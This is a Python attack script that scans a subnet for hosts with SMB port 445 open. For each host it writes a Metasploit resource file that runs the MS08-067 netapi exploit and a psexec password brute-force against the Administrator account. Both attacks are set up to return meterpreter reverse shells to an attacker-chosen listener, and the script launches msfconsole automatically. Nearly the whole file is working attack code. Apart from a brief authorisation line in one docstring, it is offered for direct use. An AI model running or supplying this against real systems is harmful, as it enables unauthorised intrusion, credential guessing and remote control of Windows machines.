'''Scan a subnet for SMB (445/tcp) hosts and drive msfconsole against them with two attack vectors: MS08-067 (netapi) and psexec with a password list.'''
import optparse
import os
import subprocess
import sys

import nmap
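def findTrgs(subNet):
    """Scan subNet with nmap and return the hosts that have 445/tcp open.

    subNet is handed straight to nmap's target parser, so it accepts any
    nmap target spec (single host, CIDR, a range such as 192.168.1.30-80).
    Returns a list of host strings, possibly empty. Only hosts whose 445
    state is reported as 'open' are kept; 'filtered'/'closed' are skipped,
    as are hosts for which nmap returned no TCP result at all.
    """
    scanner = nmap.PortScanner()
    scanner.scan(subNet, '445')  # 445/tcp is SMB
    targets = []
    for host in scanner.all_hosts():
        # A host may be up without a TCP table for 445 (e.g. host-only
        # discovery); guard before indexing into it.
        if not scanner[host].has_tcp(445):
            continue
        if scanner[host]['tcp'][445]['state'] == 'open':
            # print() with a single argument is valid in both Python 2 and 3.
            print('[+] Found target host: ' + host)
            targets.append(host)
    return targets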
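def setupHandler(configFile, lhost, lport):
    """Write the shared reverse_tcp listener to the rc file.

    A single multi/handler job on lhost:lport catches the sessions from
    every exploit written after it, so those modules must not start their
    own handlers. That is done with ``setg`` rather than ``set``:
    a plain ``set`` only touches the current module's (multi/handler's)
    datastore and would be dropped when the script ``use``s the next
    module; ``setg`` puts DisablePayloadHandler in the global datastore,
    which every subsequently loaded module inherits.
    """
    configFile.write('use exploit/multi/handler\n')
    configFile.write('set payload windows/meterpreter/reverse_tcp\n')
    configFile.write('set LPORT ' + str(lport) + '\n')
    configFile.write('set LHOST ' + str(lhost) + '\n')
    configFile.write('exploit -j -z\n')  # background job, no interaction
    configFile.write('setg DisablePayloadHandler 1\n')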
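def confikerExplopit(configFile, trgHost, lhost, lport):
    """Append an MS08-067 (netapi) attempt against trgHost to the rc file.

    The reverse_tcp payload is pointed at lhost:lport, which must match the
    listener written by setupHandler so the session lands in the shared
    handler. The (misspelt) function name is kept because main() calls it.
    """
    configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
    # RHOST is accepted by msfconsole as an alias of RHOSTS on this module.
    configFile.write('set RHOST ' + str(trgHost) + '\n')
    # Option name must be exactly 'payload': msfconsole's ``set`` does not
    # reject unknown names, so a typo here silently leaves the module on
    # its default payload, which may not match the handler.
    configFile.write('set payload windows/meterpreter/reverse_tcp\n')
    configFile.write('set LPORT ' + str(lport) + '\n')
    configFile.write('set LHOST ' + str(lhost) + '\n')
    configFile.write('exploit -j -z\n')  # background job, no interaction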
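def smbBrute(configFile, trgHost, passwdFile, lhost, lport):
    """Append one psexec attempt per password in passwdFile against trgHost.

    Every candidate is tried for the local 'Administrator' account. The
    passwords are written verbatim into the rc file, so that file holds
    the whole wordlist in cleartext -- protect and remove it accordingly.
    Blank lines are skipped: an empty ``set SMBPass`` would merely echo the
    previous value instead of trying an empty password.

    Raises IOError/OSError if passwdFile cannot be opened.
    """
    username = 'Administrator'
    # ``with`` so the wordlist is closed even if configFile.write fails.
    with open(passwdFile, 'r') as wordlist:
        for line in wordlist:
            password = line.strip('\r\n')
            if not password:
                continue
            configFile.write('use exploit/windows/smb/psexec\n')
            configFile.write('set SMBUser ' + str(username) + '\n')
            configFile.write('set SMBPass ' + str(password) + '\n')
            configFile.write('set RHOST ' + str(trgHost) + '\n')
            configFile.write('set payload windows/meterpreter/reverse_tcp\n')
            configFile.write('set LPORT ' + str(lport) + '\n')
            configFile.write('set LHOST ' + str(lhost) + '\n')
            configFile.write('exploit -j -z\n')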
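def main():
    """Parse options, find SMB hosts, write meta.rc and hand it to msfconsole.

    Exits with status 1 when -H or -l is missing, or when no host in the
    target range has 445/tcp open (there is then nothing to attack and no
    point starting msfconsole). Only run this against hosts you are
    authorised to test.
    """
    parser = optparse.OptionParser(
        '[-] Usage: %prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <password File>]')
    parser.add_option('-H', dest='trgHost', type='string',
                      help='Specify the target address[es]')
    parser.add_option('-p', dest='lport', type='string',
                      help='specify the listening port')
    parser.add_option('-l', dest='lhost', type='string',
                      help='Specify the listening host')
    parser.add_option('-F', dest='passwdFile', type='string',
                      help='Specify the password file for smb brute force attempt')
    (options, args) = parser.parse_args()
    if options.trgHost is None or options.lhost is None:
        print(parser.usage)
        sys.exit(1)  # bad invocation is a failure, not success

    lhost = options.lhost
    lport = options.lport if options.lport is not None else '1337'
    passwdFile = options.passwdFile

    trgHosts = findTrgs(options.trgHost)  # e.g. 192.168.1.30-80
    if not trgHosts:
        print('[-] No hosts with 445/tcp open in ' + options.trgHost)
        sys.exit(1)

    # The rc file contains the attack plan and, with -F, every password in
    # cleartext. Create it owner-read/write only; os.open's mode is ignored
    # for a pre-existing file, hence the explicit chmod as well.
    rcPath = 'meta.rc'
    fd = os.open(rcPath, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    os.chmod(rcPath, 0o600)
    with os.fdopen(fd, 'w') as configFile:
        setupHandler(configFile, lhost, lport)
        for trgHost in trgHosts:
            confikerExplopit(configFile, trgHost, lhost, lport)
            if passwdFile is not None:
                smbBrute(configFile, trgHost, passwdFile, lhost, lport)

    # Argument list, no shell: nothing here is interpolated into a command
    # line. The rc file is left in place for inspection -- delete it when
    # done, it is sensitive.
    subprocess.call(['msfconsole', '-r', rcPath])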
# Script entry point; importing the module does not start a scan.
if __name__ == "__main__":
    main()